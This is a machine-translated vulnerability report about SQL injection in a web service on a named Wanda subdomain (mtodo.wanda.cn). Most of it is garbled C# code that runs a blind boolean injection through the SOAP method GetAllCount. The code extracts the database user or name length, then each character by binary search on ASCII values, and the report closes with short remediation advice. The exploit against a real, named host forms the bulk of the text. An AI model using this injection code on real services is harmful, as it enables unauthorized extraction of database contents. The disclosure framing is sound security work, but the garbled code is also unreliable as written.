One SQL injection vulnerability in a sub-station in Wanda

One SQL injection vulnerability in a sub-station in Wanda

Vulnerability site: mtodo.wanda.cn does not know what the site is doing ~~

Vulnerability document: http://mtodo.wanda.cn/ServiceMobile.asmx? Op = GetAllCount

If you directly submit a parameter with an injection, it will be 302:
 

Since there is a webservice, we can use the code to try it through the soap protocol. So we started to talk about vs in a mess ~~
 

Current User:
 

The messy one-meter code written by Ben:

Cn. wanda. mtodo. serviceMobile sm = new cn. wanda. mtodo. serviceMobile (); private void btnGetAllCount_Click (object sender, EventArgs e) {try {string leix = this.txt Userid. text; int str_len = 0; // length of the user or database name // take the length for (int j = 1; j <20; j ++) // suppose the maximum length is 20, generally it will not exceed that long {string rrr = sm. getAllCount ("'or 1 = 1 and" + j + "= len (" + leix + ") --"); // {\ "success \": true, \ "Rows \": 16, \ "message \": \ "\"} if (sm. getAllCount ("'or 1 = 1 and" + j + "= len (" + leix + ")--")). contains ("1700") {str_len = j ;}} this.txt Msg. text = this.txt Userid. text + "len:" + str_len + "\ r \ n"; this.txt Msg. text + = leix + ":"; if (str_len> 0) {// obtain the current user/Database Name int [] asc = {32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127}; for (int k = 1; k <= str_len; k ++) {int low = 1; // minimum int high = asc. length; // array Length int mid; while (low <= high) {mid = (low + high)/2; // obtain the median string name = sm. getAllCount ("'or 1 = 1 and" + asc [mid] + "<= ascii (substring (" + leix + "," + k + ", 1 )) -- "); if (name. contains ("1700") {low = mid + 1; if (sm. getAllCount ("'or 1 = 1 and" + asc [mid] + "= ascii (substring (" + leix + "," + k + ", 1 )) --")). contains ("1700") {this.txt Msg. text + = Encoding. ASCII. getString (new byte [] {(byte) asc [mid]}) ;}} else {high = mid-1 ;}}} catch (Exception eq) {this.txt Msg. text + = eq. message ;}}

 

 

Solution:

1. parameterized query. Do not spell out SQL statements.

2. It is best to deploy webservice to call in the Intranet ~ Do not enable the public network.